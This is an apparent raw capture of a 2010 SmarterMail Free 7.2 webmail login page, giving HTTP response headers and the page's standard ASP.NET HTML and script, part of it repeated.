<script src="/WebResource.axd?d=sooKBuYSerZQi58Dl6wqJg2&t=633802452069218315" type="text/javascript"></script>
<script type="text/javascript">
//<![CDATA[
Sys.WebForms.PageRequestManager._initialize('ctl00$ScriptManager1', document.getElementById('aspnetForm'));
Sys.WebForms.PageRequestManager.getInstance()._updateControls(['tctl00$UpdatePanel1'], [], [], 90);
//]]>
</script>
<script type="text/javascript" src="/App_Themes/Default/Javascript/JavaScript.ashx?guid=1CB60CF5B830100_1.6.3925.24513_&fileMask="></script>
<div id="ctl00_UpdatePanel1">
<div class="CenteredLogin">
<div class="ShadowBox">
<div class="LoginBox">
<div class="LoginTitle">
<div class="RoundedPageTitleLeft">
<div class="RoundedPageTitleRight">
<div class="LoginTitleText">
Login to SmarterMail
</div>
</div>
</div>
</div>
<div class="LoginFrame">
<div class="RoundedBottom">
<div class="RoundedLeft">
<div class="RoundedRight">
<div class="RoundedBottomLeft">
<div class="RoundedBottomRight">
<div id="ctl00_TipTextDiv" class="LoginTipTextContainer">
</div>
<div class="LoginSpacer">
</div>
<div class="LoginContent">
<div class="LoginSetting">
<div class="LoginLabel">
Email Address
(ex. user@example.com)
</div>
<input name="ctl00$MPH$txtUserName" type="text" id="ctl00_MPH_txtUserName" tabindex="1" style="width: 310px" />
</div>
<div class="LoginSetting">
<div class="LoginLabel">
Password<br />
</div>
<input name="ctl00$MPH$txtPassword" type="password" id="ctl00_MPH_txtPassword" tabindex="2" style="width: 310px" />
</div>
<div class="LoginSetting">
<span class="LoginRememberMe">
<input id="ctl00_MPH_chkAutoLogin" type="checkbox" name="ctl00$MPH$chkAutoLogin" tabindex="3" /><label for="ctl00_MPH_chkAutoLogin">Remember me</label></span><br />
</div>
</div>
<div class="LoginButtons">
<select name="ctl00$BPH$LanguageList" onchange="javascript:setTimeout('__doPostBack(\'ctl00$BPH$LanguageList\',\'\')', 0)" id="ctl00_BPH_LanguageList" tabindex="6">
<option selected="selected" value="">Use Browser Language</option>
<option value="en">English</option>
</select>
<div id="ctl00_BPH_HelpImageButton" class="BBButton"><a class="ButtonBarAnchor" href="http%3a%2f%2fwww%2esmartertools%2ecom%2fHelp%2fSmarterMail%2fv7%2fDefault%2easpx%3fp%3d%5fUSR%26v%3d7%2e2%2e3925%26lang%3den%2dUS%26page%3dLoginUser" target="helpwindow" onclick="window.open('http\x3a\x2f\x2fwww\x2esmartertools\x2ecom\x2fHelp\x2fSmarterMail\x2fv7\x2fDefault\x2easpx\x3fp\x3d\x5fUSR\x26v\x3d7\x2e2\x2e3925\x26lang\x3den\x2dUS\x26page\x3dLoginUser','helpwindow',''); return false;" tabindex='5'><span class="BBInner">Help</span></a></div>
<div id="ctl00_BPH_LoginImageButton" class="BBButton"><a class="ButtonBarAnchor" target="_self" href="#" tabindex='4' onclick=" __doPostBack('ctl00$BPH$LoginImageButton',''); return false;"><span class="BBInner">Login</span></a></div>
<input type="image" name="ctl00$BPH$btnEnterClick" id="ctl00_BPH_btnEnterClick" tabindex="-1" src="/s.gif" alt=" " style="height:0px;width:0px;border-width:0px;" />
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
<div class="LoginLinks">
<a href='http://www.smartertools.com/smartermail/mail-server-software.aspx' target='_blank'>SmarterMail Free 7.2</a> | <a href='http://www.smartertools.com/smartermail/mail-server-software.aspx' target='_blank'>Windows Mail Server</a> | © 2010 <a href='http://www.smartertools.com/' target='_blank'>SmarterTools Inc.</a>
</div>
</div>
<script type="text/javascript">
$(document).ready(function() {
$('select').each(function() {
if ($(this).width() > 180) $(this).width(180);
});
}); </script>
</div>
<script type="text/javascript">
//<![CDATA[
WebForm_AutoFocus('ctl00_MPH_txtUserName');Sys.Application.initialize();
//]]>
</script>
</form>
</body>
</html>
Server: SmarterTools/2.0.3925.24451
Date: Sun, 03 Oct 2010 00:33:21 GMT
X-AspNet-Version: 2.0.50727
Content-Encoding:
X-Compressed-By: HttpCompress
Set-Cookie: ASP.NET_SessionId=rzf1kd55owkddk45aac20t45; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 3294
Connection: Close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><title>
SmarterMail Login - SmarterMail
</title>
<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon" />
<link rel="icon" href="/favicon.ico" type="image/ico" />
<script type="text/javascript">
if (parent.isRoot != null)
parent.location.href = location.href;
if (parent.parent.isRoot != null)
parent.parent.location.href = location.href;
</script>
<link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&fileMask=Main/&rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&fileMask=Mail/&rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&fileMask=Login/&rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&fileMask=Telerik&rtl=false" rel="stylesheet" type="text/css" />
<!--[if lte IE 6]>
<style type="text/css">@import '/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&fileMask=BrowserOverrides/ie6&rtl=false';</style>
<![endif]-->
<meta http-equiv="cache-control" content="no-cache"><meta http-equiv="pragma" content="no-cache"></head>
<body class="Login" dir="ltr">
<form method="post" action="Login.aspx" id="aspnetForm">
<div>
<input type="hidden" name="__LASTFOCUS" id="__LASTFOCUS" value="" />
<input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
<input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTI4NzA5NDYyNg8WBB4QX19fUmVzdWx0RmFpbHVyZWUeEF9fX1Jlc3VsdFN1Y2Nlc3NlFgJmD2QWAgIBD2QWAgIFD2QWAmYPZBYGAgMPZBYCAgEPFgIeBFRleHRlZAIFD2QWAgILDxAPFgIfAgULUmVtZW1iZXIgbWVkZGRkAgcPZBYGAgEPEGQQFQIUVXNlIEJyb3dzZXIgTGFuZ3VhZ2UHRW5nbGlzaBUCAAJlbhQrAwJnZxYBZmQCAw8PFgIeC05hdmlnYXRlVVJMBWhodHRwOi8vd3d3LnNtYXJ0ZXJ0b29scy5jb20vSGVscC9TbWFydGVyTWFpbC92Ny9EZWZhdWx0LmFzcHg/cD1fVVNSJnY9Ny4yLjM5MjUmbGFuZz1lbi1VUyZwYWdlPUxvZ2luVXNlcmRkAgcPDxYIHghJbWFnZVVybAUGL3MuZ2lmHgVXaWR0aBsAAAAAAAAAAAEAAAAeBkhlaWdodBsAAAAAAAAAAAEAAAAeBF8hU0ICgANkZBgBBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WAgUWY3RsMDAkTVBIJGNoa0F1dG9Mb2dpbgUXY3RsMDAkQlBIJGJ0bkVudGVyQ2xpY2sEHZ/xDsa2Ruq8vSjNI7VPml35tg==" />
</div>
<script type="text/javascript">
//<![CDATA[
var theForm = document.forms['aspnetForm'];
if (!theForm) {
theForm = document.aspnetForm;
}
function __doPostBack(eventTarget, eventArgument) {
if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
theForm.__EVENTTARGET.value = eventTarget;
theForm.__EVENTARGUMENT.value = eventArgument;
theForm.submit();
}
}
//]]>
</script>
<script src="/WebResource.axd?d=lFfe_wSSLYBiWo0hdQTqNA2&t=633802452069218315" type="text/javascript"></script>
<script src="/ScriptResource.axd?d=PkU8JqZ1AqOnNUfS9wB-O8XFAfH3kdpAehi09BJok9KiMBXqeEWZLvdsdUFLbPxYAD0iIeAHZBtPh1mybNd0fzbzD1H1EGEbNX_3WW4l9J01&t=ffffffffec2d9970" type="text/javascript"></script>
<script src="/ScriptResource.axd?d=PkU8JqZ1AqOnNUfS9wB-O8XFAfH3kdpAehi09BJok9KiMBXqeEWZLvdsdUFLbPxYxlutgliktFrtyUOE-2vtH5p7RzBBFeKiwavJVGKo3xk1&t=ffffffffec2d9970" type="text/javascript"></script>
<script src="/WebResource.axd?d=sooKBuYSerZQi58Dl6wqJg2&t=633802452069218315" type="text/javascript"></script>
<script type="text/javascript">
//<![CDATA[
Sys.WebForms.PageRequestManager._initialize('ctl00$ScriptManager1', document.getElementById('aspnetForm'));
Sys.WebForms.PageRequestManager.getInstance()._updateControls(['tctl00$UpdatePanel1'], [], [], 90);
//]]>
</script>
<script type="text/javascript" src="/App_Themes/Default/Javascript/JavaScript.ashx?guid=1CB60CF5B830100_1.6.3925.24513_&fileMask="></script>
<div id="ctl00_UpdatePanel1">
<div class="CenteredLogin">
<div class="ShadowBox">
<div class="LoginBox">
<div class="LoginTitle">
<div class="RoundedPageTitleLeft">
<div class="RoundedPageTitleRight">
<div class="LoginTitleText">
Login to SmarterMail
</div>
</div>
</div>
</div>
<div class="LoginFrame">
<div class="RoundedBottom">
<div class="RoundedLeft">
<div class="RoundedRight">
<div class="RoundedBottomLeft">
<div class="RoundedBottomRight">
<div id="ctl00_TipTextDiv" class="LoginTipTextContainer">
</div>
<div class="LoginSpacer">
</div>
<div class="LoginContent">
<div class="LoginSetting">
<div class="LoginLabel">
Email Address
(ex. user@example.com)
</div>
<input name="ctl00$MPH$txtUserName" type="text" id="ctl00_MPH_txtUserName" tabindex="1" style="width: 310px" />
</div>
<div class="LoginSetting">
<div class="LoginLabel">
Password<br />
</div>
<input name="ctl00$MPH$txtPassword" type="password" id="ctl00_MPH_txtPassword" tabindex="2" style="width: 310px" />
</div>
<div class="LoginSetting">
<span class="LoginRememberMe">
<input id="ctl00_MPH_chkAutoLogin" type="checkbox" name="ctl00$MPH$chkAutoLogin" tabindex="3" /><label for="ctl00_MPH_chkAutoLogin">Remember me</label></span><br />
</div>
</div>
<div class="LoginButtons">
<select name="ctl00$BPH$LanguageList" onchange="javascript:setTimeout('__doPostBack(\'ctl00$BPH$LanguageList\',\'\')', 0)" id="ctl00_BPH_LanguageList" tabindex="6">
<option selected="selected" value="">Use Browser Language</option>
<option value="en">English</option>
</select>
<div id="ctl00_BPH_HelpImageButton" class="BBButton"><a class="ButtonBarAnchor" href="http%3a%2f%2fwww%2esmartertools%2ecom%2fHelp%2fSmarterMail%2fv7%2fDefault%2easpx%3fp%3d%5fUSR%26v%3d7%2e2%2e3925%26lang%3den%2dUS%26page%3dLoginUser" target="helpwindow" onclick="window.open('http\x3a\x2f\x2fwww\x2esmartertools\x2ecom\x2fHelp\x2fSmarterMail\x2fv7\x2fDefault\x2easpx\x3fp\x3d\x5fUSR\x26v\x3d7\x2e2\x2e3925\x26lang\x3den\x2dUS\x26page\x3dLoginUser','helpwindow',''); return false;" tabindex='5'><span class="BBInner">Help</span></a></div>
<div id="ctl00_BPH_LoginImageButton" class="BBButton"><a class="ButtonBarAnchor" target="_self" href="#" tabindex='4' onclick=" __doPostBack('ctl00$BPH$LoginImageButton',''); return false;"><span class="BBInner">Login</span></a></div>
<input type="image" name="ctl00$BPH$btnEnterClick" id="ctl00_BPH_btnEnterClick" tabindex="-1" src="/s.gif" alt=" " style="height:0px;width:0px;border-width:0px;" />
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
<div class="LoginLinks">
<a href='http://www.smartertools.com/smartermail/mail-server-software.aspx' target='_blank'>SmarterMail Free 7.2</a> | <a href='http://www.smartertools.com/smartermail/mail-server-software.aspx' target='_blank'>Windows Mail Server</a> | © 2010 <a href='http://www.smartertools.com/' target='_blank'>SmarterTools Inc.</a>
</div>
</div>
<script type="text/javascript">
$(document).ready(function() {
$('select').each(function() {
if ($(this).width() > 180) $(this).width(180);
});
}); </script>
</div>
<script type="text/javascript">
//<![CDATA[
WebForm_AutoFocus('ctl00_MPH_txtUserName');Sys.Application.initialize();
//]]>
</script>
</form>
</body>
</html>